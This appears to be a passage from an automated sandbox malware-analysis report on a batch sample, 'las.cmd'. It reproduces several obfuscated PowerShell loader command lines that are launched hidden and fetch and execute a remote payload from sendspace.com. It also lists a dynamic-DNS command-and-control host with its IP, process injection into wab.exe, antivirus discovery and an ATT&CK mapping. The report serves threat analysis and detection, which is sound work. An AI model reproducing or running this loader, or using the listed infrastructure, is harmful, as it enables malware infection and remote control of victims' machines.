cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oeb.pappvakkeutakstdsublue
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oeb.pappvakkeutakstdsublueJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$vanddraabes = 1;$precautioning='sub';$precautioning+='strin';$precautioning+='g';function forfladigelsens($tusmrkets152){$tsp=$tusmrkets152.length-$vanddraabes;for($velours=5;$velours -lt $tsp;$velours+=6){$ventin+=$tusmrkets152.$precautioning.invoke( $velours, $vanddraabes);}$ventin;}function inddatafiler223($dorathea){. ($rull) ($dorathea);}$gianthood=forfladigelsens ' ame.mbirtho terszunchaienepilsynkrlreassagasco/ pan,5gub.e. stat0sjlen stab,(tilh,wgod eivilstn kompd undeosalpiwh lhes symp g njansp,citream. maal1genne0matem.euro,0 norm;hed,s hjnelw iegfipneu n opfl6preim4induk;cleis unc,nxdecon6 glob4unbra;stutt krsenr.ybbjvmatri:tende1f rku2 lejl1under.impu.0gy,ur)ordre redepgrela.estaalc rofokb,nhao cart/cy ni2.ubdi0ag ic1.emix0re.ie0myrmi1under0 yndi1 lyst anticf unshisylphrur.nvephotof te to akkox stup/pleje1 purc2 cela1ko,me.enarb0,orca ';$varmepudes=forfladigelsens ' ammeudelitswatere.ejdsrdemon- unrealeap ghennee ultrnirreftlandb ';$radernes=forfladigelsens 'spildhkrsustsotadtpreinp ,lamstillb:satis/ gust/shamew mergwhierowgend..scia s resyereinfn indkdqueevsddsdope cepaevangcgyptoeernri.offercunf.ioov.rbmbrugs/vandepunf lrlsri.osubst/censud prehl.arak/mccar7linalyrdkriiunpe,2se,vif dewwu ety ';$koglespillets=forfladigelsens 'flyvn>overb ';$rull=forfladigelsens 'k emsitvillecampbxmodul ';$hvervende='limpindene';$bondages = forfladigelsens 'forvae,uculcpredohmar,no stan hande%hvidvatrio,pcampsp unt dwhupoa ,ntetsprudahyper% ieth\te,tipanstrrrestaetysseasyconfnyklaf fdeaisecanroksekmpicayab,saat tubeiattrivmunkeemadag.overcsundepplapidok.pit dulge&dimme& betu aabene violcsaumohzenogoch,pp godl,tryota ';inddatafiler223 (forfladigelsens 'ant a$sandwgfac,il,rojeo anaabtrskeabilfrl nons:chl,rt un,erejakuoved ummissolmatche u.dencircudl.lyaeopsam= ufor(b.ligcsmudsmfortidbalka oligo/skri.c ,ype krysa$ gejrbtriano.enkrnuaf jdsiph.aaltingaegeregenfosflip,)densi ');inddatafiler223 (forfladigelsens ' ena $f ralgforlalstenlobryggb nonea un,tlhokus:ranomu udenncreatf udmuoudr drdiatoke,dkkep,eendnmousnaz,cyesaftfsv.llass.ces= a.pr$hasperfj.rnaslui.d kommeund,frfillin tubie sttts afde.unhelsmn.dep ano ltilreic rpotreflu(orgia$ stjekcorreosyningkateglbade elavtrsapporpr.turihydrolherrel ,apoeexemptinrolsdinos)a ato ');$radernes=$unforkedness[0];$yojuane= (forfladigelsens '.irma$dissogindfjl bordoforfebunconadonn lceleb:indicsbyggem banipbilleic.alish.rsktun.eromar,il .etrequi krpres.nboha.ek,rne=,larmnnona,ecosufwshort-criolokarspb hebejoverde troccsner,t rypt stagns r,vaysepa sb.idgt xyloebinnomgymno.rekvinnoc aekajentresub.niveawdentierandsb cistcfin llportrifrekveenfamnnondot');$yojuane+=$tromlende[1];inddatafiler223 ($yojuane);inddatafiler223 (forfladigelsens 'clown$ entrs unubmrhetiplns.ai congs sablthusbeopolynlbacche ledoremmennhandeeteren. d.phhs,elleepizzariverdstande maalr silis trla[vadeh$al.idvcor ia anverunminm pe,oeJump to behavior
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q&
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]qx
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]qPaste_bin@\]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000020FAD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020FBD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q
        Source: wab.exe, 00000009.00000002.3255609581.0000000021170000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,]q
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
        Windows Management Instrumentation        		1
        DLL Side-Loading        		112
        Process Injection        		1
        Masquerading        		OS Credential Dumping21
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell        		Logon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeylogging113
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials14
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446773 Sample: las.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 30 xvern429.duckdns.org 2->30 32 198.187.3.20.in-addr.arpa 2->32 34 3 other IPs or domains 2->34 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 54 3 other signatures 2->54 9 cmd.exe 1 2->9         started        signatures3 52 Uses dynamic DNS services 30->52 process4 signatures5 56 Suspicious powershell command line found 9->56 58 Very long command line found 9->58 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 38 fs03n3.sendspace.com 69.31.136.17, 443, 49705, 62797 GTT-BACKBONEGTTDE United States 12->38 40 www.sendspace.com 172.67.170.105, 443, 49704, 62796 CLOUDFLARENETUS United States 12->40 60 Suspicious powershell command line found 12->60 62 Very long command line found 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 42 Writes to foreign memory regions 18->42 44 Found suspicious powershell code related to unpacking or dynamic code loading 18->44 25 wab.exe 1 14 18->25         started        28 cmd.exe 1 18->28         started        process11 dnsIp12 36 xvern429.duckdns.org 12.202.180.134, 62798, 8890 FISERV-INCUS United States 25->36

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        las.cmd3%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://crl.microsoft0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.microsoft.0%URL Reputationsafe
        https://aka.ms/pscore6lB0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://www.sendspace.com/pro/dl/7yi2fu0%Avira URL Cloudsafe
        https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJX0%Avira URL Cloudsafe
        https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/7yi2fuP0%Avira URL Cloudsafe
        http://www.sendspace.com0%Avira URL Cloudsafe
        https://fs03n4.sendspace.com0%Avira URL Cloudsafe
        https://fs03n3.sendspace.com/20%Avira URL Cloudsafe
        https://www.sendspace.com0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/7yi2fuXR0%Avira URL Cloudsafe
        https://fs03n3.sendspace.com/0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/lt00vw50%Avira URL Cloudsafe
        https://www.sendspace.com/0%Avira URL Cloudsafe
        https://www.sendspace.com/pro/dl/lt00vw0%Avira URL Cloudsafe
        https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea0%Avira URL Cloudsafe
        https://fs03n4.sendspace.comX0%Avira URL Cloudsafe
        http://fs03n4.sendspace.com0%Avira URL Cloudsafe
        https://fs03n3.sendspace.com/om:4430%Avira URL Cloudsafe
        https://fs03n4.sendspaX0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        fs03n4.sendspace.com
        		69.31.136.17
        		truefalse
          		unknown
          fs03n3.sendspace.com
          		69.31.136.17
          		truefalse
            		unknown
            xvern429.duckdns.org
            		12.202.180.134
            		truetrue
              		unknown
              www.sendspace.com
              		172.67.170.105
              		truefalse
                		unknown
                198.187.3.20.in-addr.arpa
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://www.sendspace.com/pro/dl/7yi2fufalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.sendspace.com/pro/dl/lt00vwfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.seafalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXwab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://crl.microsoftpowershell.exe, 00000006.00000002.2437943823.0000000002F57000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
